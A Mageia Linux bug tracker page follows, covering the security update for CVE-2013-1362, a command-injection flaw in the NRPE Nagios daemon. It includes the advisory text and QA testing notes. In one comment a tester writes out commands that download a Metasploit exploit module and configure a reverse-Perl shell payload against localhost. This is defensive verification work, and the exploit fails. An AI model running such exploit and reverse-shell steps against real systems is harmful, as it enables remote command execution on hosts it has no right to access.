Bug 9615 - nrpe new security issue CVE-2013-1362
Summary: nrpe new security issue CVE-2013-1362
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 2
Hardware: i586 Linux
Priority: Normal critical
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL: http://lwn.net/Vulnerabilities/545985/
Whiteboard: has_procedure mga2-64-ok mga2-32-ok
Keywords: validated_update
Depends on:
Reported: 2013-04-04 18:38 CEST by David Walser
Modified: 2013-05-09 12:36 CEST (History)
4 users (show)

See Also:
Source RPM: nrpe-2.13-6.mga3.src.rpm
Status comment:


Description David Walser 2013-04-04 18:38:46 CEST
OpenSuSE has issued an advisory today (April 4):

Mageia 2 is also affected.


Steps to Reproduce:
David Walser 2013-04-04 18:39:07 CEST

CC: (none) => dlucio
Assignee: bugsquad => dlucio
Whiteboard: (none) => MGA2TOO

Comment 1 David Walser 2013-04-05 14:02:14 CEST
Fixed in Cauldron in nrpe-2.14-1.mga3.

CC: (none) => guillomovitch
Version: Cauldron => 2
Whiteboard: MGA2TOO => (none)

Comment 2 David Walser 2013-04-05 14:51:33 CEST
(In reply to David Walser from comment #1)
> Fixed in Cauldron in nrpe-2.14-1.mga3.

Oops, not quite yet:

Version: 2 => Cauldron
Whiteboard: (none) => MGA2TOO

Comment 3 David Walser 2013-04-05 16:05:39 CEST
nrpe-2.14-1.mga3 uploaded in Cauldron.  Thanks Guillaume.

Version: Cauldron => 2
Whiteboard: MGA2TOO => (none)

Comment 4 David Walser 2013-05-02 17:25:17 CEST
This is updated in SVN for Mageia 2 by Daniel Lucio.

We had to remove it from updates_testing because the release tag was wrong, as it should be 1 with no subrel, so that it's not newer than Cauldron.  I fixed the release tag in SVN.

Daniel, if this update is otherwise ready, go ahead and submit it to the build system again and we can assign this to QA.  Thanks.
Comment 5 David Walser 2013-05-02 21:48:26 CEST
Updated package uploaded for Mageia 2.  Thanks Daniel!


Updated nrpe packages fix security vulnerability:

NRPE (the Nagios Remote Plug-In Executor) allows the passing of $() to
plugins/scripts which, if run under bash, will execute that shell command
under a subprocess and pass the output as a parameter to the called script.
Using this, it is possible to get called scripts, such as check_http, to
execute arbitrary commands under the uid that NRPE/nagios is running as
(typically, 'nagios') (CVE-2013-1362).

With this update NRPE will deny remote requests containing a bash command substitution.


Updated packages in core/updates_testing:

from nrpe-2.14-1.mga2.src.rpm

Assignee: dlucio => qa-bugs

Comment 6 claire robinson 2013-05-03 19:08:07 CEST
PoC: http://www.youtube.com/watch?v=OBgjp9gheBM

# service nrpe start
Starting nrpe (via systemctl):                              [  OK  ]

# netstat -at | grep nrpe
tcp        0      0 *:nrpe           *:*                     LISTEN

# /usr/lib/nagios/plugins/check_nrpe -H localhost
NRPE v2.12

# tailf /var/log/syslog

Open another terminal tab..

$ git clone https://github.com/bcoles/metasploit-framework.git metasploit

$ wget -O metasploit/modules/exploits/linux/misc/nagios_nrpe_arguments.rb http://packetstormsecurity.com/files/download/121287/nagios_nrpe_arguments.rb.txt

$ cd metasploit/
$ ./msfconsole

at metasploit console..

msf > use exploit/linux/misc/nagios_nrpe_arguments
msf  exploit(nagios_nrpe_arguments) > show options
msf  exploit(nagios_nrpe_arguments) > set RHOST localhost
RHOST => localhost
msf  exploit(nagios_nrpe_arguments) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf  exploit(nagios_nrpe_arguments) > set LHOST localhost
LHOST => localhost
msf  exploit(nagios_nrpe_arguments) > exploit

[*] Started reverse handler on
[*] Checking if remote NRPE supports command line arguments
[-] Exploit failed [not-found]: Host does not support plugin command line arguments or is not accepting connections

In syslog in the other terminal tab..

nrpe[18189]: Error: Request contained command arguments, but argument option is not enabled!
nrpe[18189]: Client request was invalid, bailing out...

We're maybe not vulnerable to this, will need to check with 2 hosts rather than both on localhost.
Comment 8 claire robinson 2013-05-03 19:13:17 CEST
Looks like this would have to be set to 1 in /etc/nagios/nrpe.conf

# Read the SECURITY file for information on some of the security implications
# of enabling this variable.
# Values: 0=do not allow arguments, 1=allow command arguments


I'll try to play some more later.
Comment 9 claire robinson 2013-05-03 19:15:15 CEST
Perhaps as we ship with it disabled and this is a direct update rather than patch it is enough to show the service is starting and listening after update.
Comment 10 claire robinson 2013-05-03 19:40:16 CEST
Notice one issue though when stopping/restarting the service..

nrpe[18832]: Caught SIGTERM - shutting down...
nrpe[18832]: Cannot remove pidfile '/var/run/nrpe/nrpe.pid' - check your privileges.
nrpe[18832]: Daemon shutdown
nrpe[19974]: Stopping nrpe: [  OK  ]

# ll /var/run/nrpe/nrpe.pid
-rw-r--r-- 1 root root 6 May  3 18:16 /var/run/nrpe/nrpe.pid

nrpe runs as user/group nagios
Comment 11 claire robinson 2013-05-03 20:20:20 CEST
Tested with two hosts, set to allow commands and to allow connections from each other and both services restarted. I'm not able to reproduce with the PoC, the exploit doesn't show a failure, just doesn't seem to work.

Just testing to ensure the updated service starts and is listening.

# /usr/lib/nagios/plugins/check_nrpe -H <remote host ip>
NRPE v2.14

Checked from 64bit local to 32bit remote and vica versa so confirmed the service is listening and talking.

The permissions issue doesn't prevent the service from stopping but it does leave a pid file behind. The pid file doesn't prevent the service from restarting either, I'll create a new bug for it.

Created bug 9972 for the pid file issue

Validating this one

SRPM & Advisory in comment 5

Could sysadmin please push from core/updates_testing to core/updates


Keywords: (none) => validated_update
Whiteboard: (none) => has_procedure mga2-64-ok mga3-32-ok
CC: (none) => sysadmin-bugs

claire robinson 2013-05-03 20:25:36 CEST

Whiteboard: has_procedure mga2-64-ok mga3-32-ok => has_procedure mga2-64-ok mga2-32-ok

Comment 12 Thomas Backlund 2013-05-09 12:36:25 CEST
Update pushed:

CC: (none) => tmb
Resolution: (none) => FIXED

Note You need to log in before you can comment on or make changes to this bug.